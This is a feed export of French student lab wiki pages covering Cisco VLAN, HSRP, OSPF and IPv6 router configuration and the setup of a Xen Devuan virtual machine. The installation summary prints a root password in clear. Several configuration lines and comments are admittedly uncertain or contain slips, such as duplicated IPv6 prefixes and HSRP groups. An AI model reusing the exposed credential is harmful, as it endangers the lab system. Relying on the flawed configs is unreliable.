    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51205</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51205"/>
				<updated>2019-11-26T13:38:54Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* le fichier /etc/bind/ima2a5-rex4ever.site */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
